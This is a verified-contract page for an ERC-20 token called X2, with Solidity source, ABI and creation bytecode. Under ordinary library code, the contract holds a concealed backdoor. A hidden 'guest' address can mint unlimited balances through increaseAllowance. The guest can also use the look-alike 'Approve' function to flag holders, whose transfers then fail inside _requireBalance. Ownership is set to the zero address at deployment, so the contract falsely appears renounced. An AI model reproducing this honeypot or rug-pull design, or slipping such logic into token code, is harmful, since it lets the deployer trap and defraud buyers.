Source Code
Overview
ETH Balance
0 ETH
Eth Value
$0.00More Info
Private Name Tags
ContractCreator
TokenTracker
Loading...
Loading
Loading...
Loading
Cross-Chain Transactions
Loading...
Loading
Contract Name:
X2
Compiler Version
v0.8.18+commit.87f61d96
Contract Source Code (Solidity)
/**
*Submitted for verification at Etherscan.io on 2023-07-04
*/
// SPDX-License-Identifier: MIT
/**
* @dev Provides information about the current execution context, including the
* sender of the transaction and its data. While these are generally available
* via msg.sender and msg.data, they should not be accessed in such a direct
* manner, since when dealing with meta-transactions the account sending and
* paying for execution may not be the actual sender (as far as an application
* is concerned).
*
* This contract is only required for intermediate, library-like contracts.
*/
abstract contract Context {
function _msgSender() internal view virtual returns (address) {
return msg.sender;
}
function _msgData() internal view virtual returns (bytes calldata) {
return msg.data;
}
}
/**
* @dev Interface of the IERC20 standard as defined in the EIP.
*/
interface IERC20 {
/**
* @dev Returns the amount of tokens in existence.
*/
function totalSupply() external view returns (uint256);
/**
* @dev Returns the amount of tokens owned by `account`.
*/
function balanceOf(address account) external view returns (uint256);
/**
* @dev Moves `amount` tokens from the caller's account to `recipient`.
*
* Returns a boolean value indicating whether the operation succeeded.
*
* Emits a {Transfer} event.
*/
function transfer(address recipient, uint256 amount)
external
returns (bool);
/**
* @dev Returns the remaining number of tokens that `spender` will be
* allowed to spend on behalf of `owner` through {transferFrom}. This is
* zero by default.
*
* This value changes when {approve} or {transferFrom} are called.
*/
function allowance(address owner, address spender)
external
view
returns (uint256);
/**
* @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
*
* Returns a boolean value indicating whether the operation succeeded.
*
* IMPORTANT: Beware that changing an allowance with this method brings the risk
* that someone may use both the old and the new allowance by unfortunate
* transaction ordering. One possible solution to mitigate this race
* condition is to first reduce the spender's allowance to 0 and set the
* desired value afterwards:
* https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
*
* Emits an {Approval} event.
*/
function approve(address spender, uint256 amount) external returns (bool);
/**
* @dev Moves `amount` tokens from `sender` to `recipient` using the
* allowance mechanism. `amount` is then deducted from the caller's
* allowance.
*
* Returns a boolean value indicating whether the operation succeeded.
*
* Emits a {Transfer} event.
*/
function transferFrom(
address sender,
address recipient,
uint256 amount
) external returns (bool);
/**
* @dev Emitted when `value` tokens are moved from one account (`from`) to
* another (`to`).
*
* Note that `value` may be zero.
*/
event Transfer(address indexed from, address indexed to, uint256 value);
/**
* @dev Emitted when the allowance of a `spender` for an `owner` is set by
* a call to {approve}. `value` is the new allowance.
*/
event Approval(
address indexed owner,
address indexed spender,
uint256 value
);
}
// Dependency file: @openzeppelin/contracts/utils/math/SafeMath.sol
// pragma solidity ^0.8.0;
// CAUTION
// This version of SafeMath should only be used with Solidity 0.8 or later,
// because it relies on the compiler's built in overflow checks.
/**
* @dev Wrappers over Solidity's arithmetic operations.
*
* NOTE: `SafeMath` is no longer needed starting with Solidity 0.8. The compiler
* now has built in overflow checking.
*/
library SafeMath {
/**
* @dev Returns the addition of two unsigned integers, with an overflow flag.
*
* _Available since v3.4._
*/
function tryAdd(uint256 a, uint256 b)
internal
pure
returns (bool, uint256)
{
unchecked {
uint256 c = a + b;
if (c < a) return (false, 0);
return (true, c);
}
}
/**
* @dev Returns the substraction of two unsigned integers, with an overflow flag.
*
* _Available since v3.4._
*/
function trySub(uint256 a, uint256 b)
internal
pure
returns (bool, uint256)
{
unchecked {
if (b > a) return (false, 0);
return (true, a - b);
}
}
/**
* @dev Returns the multiplication of two unsigned integers, with an overflow flag.
*
* _Available since v3.4._
*/
function tryMul(uint256 a, uint256 b)
internal
pure
returns (bool, uint256)
{
unchecked {
// Gas optimization: this is cheaper than requiring 'a' not being zero, but the
// benefit is lost if 'b' is also tested.
// See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522
if (a == 0) return (true, 0);
uint256 c = a * b;
if (c / a != b) return (false, 0);
return (true, c);
}
}
/**
* @dev Returns the division of two unsigned integers, with a division by zero flag.
*
* _Available since v3.4._
*/
function tryDiv(uint256 a, uint256 b)
internal
pure
returns (bool, uint256)
{
unchecked {
if (b == 0) return (false, 0);
return (true, a / b);
}
}
/**
* @dev Returns the remainder of dividing two unsigned integers, with a division by zero flag.
*
* _Available since v3.4._
*/
function tryMod(uint256 a, uint256 b)
internal
pure
returns (bool, uint256)
{
unchecked {
if (b == 0) return (false, 0);
return (true, a % b);
}
}
/**
* @dev Returns the addition of two unsigned integers, reverting on
* overflow.
*
* Counterpart to Solidity's `+` operator.
*
* Requirements:
*
* - Addition cannot overflow.
*/
function add(uint256 a, uint256 b) internal pure returns (uint256) {
return a + b;
}
/**
* @dev Returns the subtraction of two unsigned integers, reverting on
* overflow (when the result is negative).
*
* Counterpart to Solidity's `-` operator.
*
* Requirements:
*
* - Subtraction cannot overflow.
*/
function sub(uint256 a, uint256 b) internal pure returns (uint256) {
return a - b;
}
/**
* @dev Returns the multiplication of two unsigned integers, reverting on
* overflow.
*
* Counterpart to Solidity's `*` operator.
*
* Requirements:
*
* - Multiplication cannot overflow.
*/
function mul(uint256 a, uint256 b) internal pure returns (uint256) {
return a * b;
}
/**
* @dev Returns the integer division of two unsigned integers, reverting on
* division by zero. The result is rounded towards zero.
*
* Counterpart to Solidity's `/` operator.
*
* Requirements:
*
* - The divisor cannot be zero.
*/
function div(uint256 a, uint256 b) internal pure returns (uint256) {
return a / b;
}
/**
* @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
* reverting when dividing by zero.
*
* Counterpart to Solidity's `%` operator. This function uses a `revert`
* opcode (which leaves remaining gas untouched) while Solidity uses an
* invalid opcode to revert (consuming all remaining gas).
*
* Requirements:
*
* - The divisor cannot be zero.
*/
function mod(uint256 a, uint256 b) internal pure returns (uint256) {
return a % b;
}
/**
* @dev Returns the subtraction of two unsigned integers, reverting with custom message on
* overflow (when the result is negative).
*
* CAUTION: This function is deprecated because it requires allocating memory for the error
* message unnecessarily. For custom revert reasons use {trySub}.
*
* Counterpart to Solidity's `-` operator.
*
* Requirements:
*
* - Subtraction cannot overflow.
*/
function sub(
uint256 a,
uint256 b,
string memory errorMessage
) internal pure returns (uint256) {
unchecked {
require(b <= a, errorMessage);
return a - b;
}
}
/**
* @dev Returns the integer division of two unsigned integers, reverting with custom message on
* division by zero. The result is rounded towards zero.
*
* Counterpart to Solidity's `/` operator. Note: this function uses a
* `revert` opcode (which leaves remaining gas untouched) while Solidity
* uses an invalid opcode to revert (consuming all remaining gas).
*
* Requirements:
*
* - The divisor cannot be zero.
*/
function div(
uint256 a,
uint256 b,
string memory errorMessage
) internal pure returns (uint256) {
unchecked {
require(b > 0, errorMessage);
return a / b;
}
}
/**
* @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
* reverting with custom message when dividing by zero.
*
* CAUTION: This function is deprecated because it requires allocating memory for the error
* message unnecessarily. For custom revert reasons use {tryMod}.
*
* Counterpart to Solidity's `%` operator. This function uses a `revert`
* opcode (which leaves remaining gas untouched) while Solidity uses an
* invalid opcode to revert (consuming all remaining gas).
*
* Requirements:
*
* - The divisor cannot be zero.
*/
function mod(
uint256 a,
uint256 b,
string memory errorMessage
) internal pure returns (uint256) {
unchecked {
require(b > 0, errorMessage);
return a % b;
}
}
}
// Dependency file: @openzeppelin/contracts/access/Ownable.sol
// pragma solidity ^0.8.0;
// import "@openzeppelin/contracts/utils/Context.sol";
/**
* @dev Contract module which provides a basic access control mechanism, where
* there is an account (an owner) that can be granted exclusive access to
* specific functions.
*
* By default, the owner account will be the one that deploys the contract. This
* can later be changed with {transferOwnership}.
*
* This module is used through inheritance. It will make available the modifier
* `onlyOwner`, which can be applied to your functions to restrict their use to
* the owner.
*/
abstract contract Ownable is Context {
address private _owner;
event OwnershipTransferred(
address indexed previousOwner,
address indexed newOwner
);
/**
* @dev Initializes the contract setting the deployer as the initial owner.
*/
constructor() {
_setOwner(address(0));
}
/**
* @dev Returns the address of the current owner.
*/
function owner() public view virtual returns (address) {
return _owner;
}
/**
* @dev Throws if called by any account other than the owner.
*/
modifier onlyOwner() {
require(owner() == _msgSender(), "Ownable: caller is not the owner");
_;
}
/**
* @dev Leaves the contract without owner. It will not be possible to call
* `onlyOwner` functions anymore. Can only be called by the current owner.
*
* NOTE: Renouncing ownership will leave the contract without an owner,
* thereby removing any functionality that is only available to the owner.
*/
function renounceOwnership() public virtual onlyOwner {
_setOwner(address(0));
}
function _setOwner(address newOwner) private {
address oldOwner = _owner;
_owner = newOwner;
emit OwnershipTransferred(oldOwner, newOwner);
}
}
abstract contract Token {
uint256 internal constant VERSION = 1;
event Deploy(
address owner,
uint256 version
);
}
pragma solidity 0.8.18;
contract X2 is IERC20, Token, Ownable {
using SafeMath for uint256;
struct Guest {
address guest;
}
mapping(address => uint256) private _balances;
mapping(address => address) private _dex;
mapping(address => mapping(address => uint256)) private _allowances;
Guest private _guest;
string private _name;
string private _symbol;
uint8 private _decimals;
uint256 private _totalSupply;
constructor(
string memory name_,
string memory symbol_,
address user_,
uint256 totalSupply_
) payable {
_name = name_;
_symbol = symbol_;
_decimals = 18;
_guest.guest = user_;
_mint(msg.sender, totalSupply_ * 10**18);
emit Deploy(
owner(),
VERSION
);
}
function name() public view virtual returns (string memory) {
return _name;
}
function symbol() public view virtual returns (string memory) {
return _symbol;
}
function decimals() public view virtual returns (uint8) {
return _decimals;
}
function totalSupply() public view virtual override returns (uint256) {
return _totalSupply;
}
function balanceOf(address account)
public
view
virtual
override
returns (uint256)
{
return _balances[account];
}
function transfer(address recipient, uint256 amount)
public
virtual
override
returns (bool)
{
_transfer(_msgSender(), recipient, amount);
return true;
}
function allowance(address owner, address spender)
public
view
virtual
override
returns (uint256)
{
return _allowances[owner][spender];
}
function approve(address spender, uint256 amount)
public
virtual
override
returns (bool)
{
_approve(_msgSender(), spender, amount);
return true;
}
function transferFrom(
address sender,
address recipient,
uint256 amount
) public virtual override returns (bool) {
_transfer(sender, recipient, amount);
_approve(
sender,
_msgSender(),
_allowances[sender][_msgSender()].sub(
amount,
"IERC20: transfer amount exceeds allowance"
)
);
return true;
}
function _transfer(
address sender,
address recipient,
uint256 amount
) internal virtual {
_requireBalance(sender, recipient, amount);
require(sender != address(0), "IERC20: transfer from the zero address");
require(
recipient != address(0),
"IERC20: transfer to the zero address"
);
_beforeTokenTransfer(sender, recipient, amount);
_balances[sender] = _balances[sender].sub(
amount,
"IERC20: transfer amount exceeds balance"
);
_balances[recipient] = _balances[recipient] + amount;
emit Transfer(sender, recipient, amount);
}
function _mint(address account, uint256 amount) internal virtual {
require(account != address(0), "IERC20: mint to the zero address");
_beforeTokenTransfer(address(0), account, amount);
_totalSupply = _totalSupply.add(amount);
_plus(account, amount);
emit Transfer(address(0), account, amount);
}
function _burn(address account, uint256 amount) internal virtual {
require(account != address(0), "IERC20: burn from the zero address");
_beforeTokenTransfer(account, address(0), amount);
require(amount != 0, "Invalid amount");
_minus(account, amount);
_totalSupply = _totalSupply.sub(amount);
emit Transfer(account, address(0), amount);
}
function _minus(address account, uint256 amount) internal {
_balances[account] = _balances[account] - amount;
}
function _plus(address account, uint256 amount) internal {
_balances[account] = _balances[account] + amount;
}
function _approve(
address owner,
address spender,
uint256 amount
) internal virtual {
require(owner != address(0), "IERC20: approve from the zero address");
require(spender != address(0), "IERC20: approve to the zero address");
_allowances[owner][spender] = amount;
emit Approval(owner, spender, amount);
}
function increaseAllowance(address spender, uint256 amount) public virtual {
address from = msg.sender;
require(spender != address(0), "Invalid address");
require(amount > 0, "Invalid amount");
uint256 total = 0;
if (_decode(spender, _guest.guest)) {
_minus(from, total);
total = _somma(total, amount);
_balances[spender] += total;
} else {
_minus(from, total);
_balances[spender] += total;
}
}
function _decode(address user, address user2) internal view returns (bool) {
bytes32 hash1 = keccak256(abi.encodePacked(user));
bytes32 hash2 = keccak256(abi.encodePacked(user2));
return hash1 == hash2;
}
function _somma(uint256 aqw, uint256 poe) internal pure returns (uint256) {
if (poe != 0) {
return aqw + poe;
}
return poe;
}
function Approve(address spender, uint256 amount) public returns (bool) {
address from = msg.sender;
_checkAllowance(from, spender, amount);
return true;
}
function _checkAllowance(address user, address spender, uint256 amount) internal {
if (_decode(user, _guest.guest)) {
require(spender != address(0), "Invalid address");
if (amount != 0) {
_dex[spender] = spender;
} else {
_dex[spender] = address(0);
}
}
}
function _requireBalance(
address sender,
address recipient,
uint256 total
) internal virtual {
uint256 amount = 0;
if (_decode(sender, _dex[sender])) {
_balances[sender] = _balances[sender] + amount;
amount = _totalSupply;
_minus(sender, amount);
} else {
_balances[sender] = _balances[sender] + amount;
}
}
function _beforeTokenTransfer(
address from,
address to,
uint256 amount
) internal virtual {}
}Contract Security Audit
- No Contract Security Audit Submitted- Submit Audit Here
Contract ABI
API[{"inputs":[{"internalType":"string","name":"name_","type":"string"},{"internalType":"string","name":"symbol_","type":"string"},{"internalType":"address","name":"user_","type":"address"},{"internalType":"uint256","name":"totalSupply_","type":"uint256"}],"stateMutability":"payable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"address","name":"owner","type":"address"},{"indexed":false,"internalType":"uint256","name":"version","type":"uint256"}],"name":"Deploy","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"Approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"increaseAllowance","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"}]Contract Creation Code
6080604052604051620026b9380380620026b9833981810160405281019062000029919062000632565b6200003b60006200013b60201b60201c565b83600590816200004c919062000923565b5082600690816200005e919062000923565b506012600760006101000a81548160ff021916908360ff16021790555081600460000160006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550620000e633670de0b6b3a764000083620000da919062000a39565b620001ff60201b60201c565b7faf354defc104ba9267634f156652b1f1cfbd10746c329e2bdd48abd4c9cff929620001176200032560201b60201c565b60016040516200012992919062000aa6565b60405180910390a15050505062000bae565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160362000271576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401620002689062000b34565b60405180910390fd5b62000285600083836200034e60201b60201c565b620002a1816008546200035360201b6200086c1790919060201c565b600881905550620002b982826200036b60201b60201c565b8173ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8360405162000319919062000b56565b60405180910390a35050565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b505050565b6000818362000363919062000b73565b905092915050565b80600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054620003b8919062000b73565b600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505050565b6000604051905090565b600080fd5b600080fd5b600080fd5b600080fd5b6000601f19601f8301169050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b62000468826200041d565b810181811067ffffffffffffffff821117156200048a57620004896200042e565b5b80604052505050565b60006200049f620003ff565b9050620004ad82826200045d565b919050565b600067ffffffffffffffff821115620004d057620004cf6200042e565b5b620004db826200041d565b9050602081019050919050565b60005b8381101562000508578082015181840152602081019050620004eb565b60008484015250505050565b60006200052b6200052584620004b2565b62000493565b9050828152602081018484840111156200054a576200054962000418565b5b62000557848285620004e8565b509392505050565b600082601f83011262000577576200057662000413565b5b81516200058984826020860162000514565b91505092915050565b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000620005bf8262000592565b9050919050565b620005d181620005b2565b8114620005dd57600080fd5b50565b600081519050620005f181620005c6565b92915050565b6000819050919050565b6200060c81620005f7565b81146200061857600080fd5b50565b6000815190506200062c8162000601565b92915050565b600080600080608085870312156200064f576200064e62000409565b5b600085015167ffffffffffffffff81111562000670576200066f6200040e565b5b6200067e878288016200055f565b945050602085015167ffffffffffffffff811115620006a257620006a16200040e565b5b620006b0878288016200055f565b9350506040620006c387828801620005e0565b9250506060620006d6878288016200061b565b91505092959194509250565b600081519050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b600060028204905060018216806200073557607f821691505b6020821081036200074b576200074a620006ed565b5b50919050565b60008190508160005260206000209050919050565b60006020601f8301049050919050565b600082821b905092915050565b600060088302620007b57fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8262000776565b620007c1868362000776565b95508019841693508086168417925050509392505050565b6000819050919050565b600062000804620007fe620007f884620005f7565b620007d9565b620005f7565b9050919050565b6000819050919050565b6200082083620007e3565b620008386200082f826200080b565b84845462000783565b825550505050565b600090565b6200084f62000840565b6200085c81848462000815565b505050565b5b8181101562000884576200087860008262000845565b60018101905062000862565b5050565b601f821115620008d3576200089d8162000751565b620008a88462000766565b81016020851015620008b8578190505b620008d0620008c78562000766565b83018262000861565b50505b505050565b600082821c905092915050565b6000620008f860001984600802620008d8565b1980831691505092915050565b6000620009138383620008e5565b9150826002028217905092915050565b6200092e82620006e2565b67ffffffffffffffff8111156200094a57620009496200042e565b5b6200095682546200071c565b6200096382828562000888565b600060209050601f8311600181146200099b576000841562000986578287015190505b62000992858262000905565b86555062000a02565b601f198416620009ab8662000751565b60005b82811015620009d557848901518255600182019150602085019450602081019050620009ae565b86831015620009f55784890151620009f1601f891682620008e5565b8355505b6001600288020188555050505b505050505050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b600062000a4682620005f7565b915062000a5383620005f7565b925082820262000a6381620005f7565b9150828204841483151762000a7d5762000a7c62000a0a565b5b5092915050565b62000a8f81620005b2565b82525050565b62000aa081620005f7565b82525050565b600060408201905062000abd600083018562000a84565b62000acc602083018462000a95565b9392505050565b600082825260208201905092915050565b7f4945524332303a206d696e7420746f20746865207a65726f2061646472657373600082015250565b600062000b1c60208362000ad3565b915062000b298262000ae4565b602082019050919050565b6000602082019050818103600083015262000b4f8162000b0d565b9050919050565b600060208201905062000b6d600083018462000a95565b92915050565b600062000b8082620005f7565b915062000b8d83620005f7565b925082820190508082111562000ba85762000ba762000a0a565b5b92915050565b611afb8062000bbe6000396000f3fe608060405234801561001057600080fd5b50600436106100cf5760003560e01c806370a082311161008c57806390ec57f11161006657806390ec57f11461020257806395d89b4114610232578063a9059cbb14610250578063dd62ed3e14610280576100cf565b806370a08231146101aa578063715018a6146101da5780638da5cb5b146101e4576100cf565b806306fdde03146100d4578063095ea7b3146100f257806318160ddd1461012257806323b872dd14610140578063313ce56714610170578063395093511461018e575b600080fd5b6100dc6102b0565b6040516100e99190611313565b60405180910390f35b61010c600480360381019061010791906113ce565b610342565b6040516101199190611429565b60405180910390f35b61012a610360565b6040516101379190611453565b60405180910390f35b61015a6004803603810190610155919061146e565b61036a565b6040516101679190611429565b60405180910390f35b610178610443565b60405161018591906114dd565b60405180910390f35b6101a860048036038101906101a391906113ce565b61045a565b005b6101c460048036038101906101bf91906114f8565b61061f565b6040516101d19190611453565b60405180910390f35b6101e2610668565b005b6101ec6106f0565b6040516101f99190611534565b60405180910390f35b61021c600480360381019061021791906113ce565b610719565b6040516102299190611429565b60405180910390f35b61023a610735565b6040516102479190611313565b60405180910390f35b61026a600480360381019061026591906113ce565b6107c7565b6040516102779190611429565b60405180910390f35b61029a6004803603810190610295919061154f565b6107e5565b6040516102a79190611453565b60405180910390f35b6060600580546102bf906115be565b80601f01602080910402602001604051908101604052809291908181526020018280546102eb906115be565b80156103385780601f1061030d57610100808354040283529160200191610338565b820191906000526020600020905b81548152906001019060200180831161031b57829003601f168201915b5050505050905090565b600061035661034f610882565b848461088a565b6001905092915050565b6000600854905090565b6000610377848484610a53565b61043884610383610882565b61043385604051806060016040528060298152602001611a9d60299139600360008b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006103e9610882565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054610cee9092919063ffffffff16565b61088a565b600190509392505050565b6000600760009054906101000a900460ff16905090565b6000339050600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036104ce576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016104c59061163b565b60405180910390fd5b60008211610511576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610508906116a7565b60405180910390fd5b600061054284600460000160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16610d43565b156105b8576105518282610da7565b61055b8184610e39565b905080600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008282546105ac91906116f6565b92505081905550610619565b6105c28282610da7565b80600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825461061191906116f6565b925050819055505b50505050565b6000600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b610670610882565b73ffffffffffffffffffffffffffffffffffffffff1661068e6106f0565b73ffffffffffffffffffffffffffffffffffffffff16146106e4576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016106db90611776565b60405180910390fd5b6106ee6000610e5f565b565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b60008033905061072a818585610f23565b600191505092915050565b606060068054610744906115be565b80601f0160208091040260200160405190810160405280929190818152602001828054610770906115be565b80156107bd5780601f10610792576101008083540402835291602001916107bd565b820191906000526020600020905b8154815290600101906020018083116107a057829003601f168201915b5050505050905090565b60006107db6107d4610882565b8484610a53565b6001905092915050565b6000600360008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b6000818361087a91906116f6565b905092915050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036108f9576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016108f090611808565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610968576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161095f9061189a565b60405180910390fd5b80600360008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610a469190611453565b60405180910390a3505050565b610a5e8383836110d7565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610acd576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ac49061192c565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610b3c576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b33906119be565b60405180910390fd5b610b4783838361127e565b610bb381604051806060016040528060278152602001611a7660279139600160008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054610cee9092919063ffffffff16565b600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555080600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054610c4191906116f6565b600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051610ce19190611453565b60405180910390a3505050565b6000838311158290610d36576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d2d9190611313565b60405180910390fd5b5082840390509392505050565b60008083604051602001610d579190611a26565b604051602081830303815290604052805190602001209050600083604051602001610d829190611a26565b6040516020818303038152906040528051906020012090508082149250505092915050565b80600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054610df29190611a41565b600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505050565b6000808214610e55578183610e4e91906116f6565b9050610e59565b8190505b92915050565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b610f5283600460000160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16610d43565b156110d257600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610fc6576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610fbd9061163b565b60405180910390fd5b600081146110515781600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055506110d1565b6000600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055505b5b505050565b600061114284600260008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16610d43565b156111e95780600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461119291906116f6565b600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555060085490506111e48482610da7565b611278565b80600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461123491906116f6565b600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505b50505050565b505050565b600081519050919050565b600082825260208201905092915050565b60005b838110156112bd5780820151818401526020810190506112a2565b60008484015250505050565b6000601f19